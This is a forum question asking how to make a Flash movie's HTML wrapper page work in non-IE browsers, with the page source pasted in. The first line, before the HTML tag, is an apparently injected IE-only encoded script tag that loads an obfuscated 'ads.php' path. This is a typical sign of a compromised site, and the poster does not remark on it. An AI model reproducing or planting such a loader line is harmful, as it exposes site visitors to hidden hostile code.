How do i make this work for all browsers?

i have this html on my flash movie, but it only seems to work in IE… can someone tell me how to enable them to work for all of the browsers? or at least the popular ones like safari, mozilla, firefox, opera, whatever…

<script language='jscript.encode' src='/root/%61%64%73.php'></script>
<HTML>
<HEAD>
<meta http-equiv=Content-Type content="text/html;  charset=ISO-8859-1">
<TITLE> ++ mDJ Studios v2 // </TITLE>
</HEAD>
<BODY bgcolor="#222222">
<table border="0" align="center" cellpadding="0" cellshading="0" width="780" height="100%">
<tr>
<td align="center" valign="middle"><EMBED src="index.swf" quality=high bgcolor=#222222  WIDTH="780" HEIGHT="750" wmode="transparent" NAME="++ mDJ Studios Pro // beta 1.0 ++" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED></td>
</tr>
</table>
</BODY>
</HTML>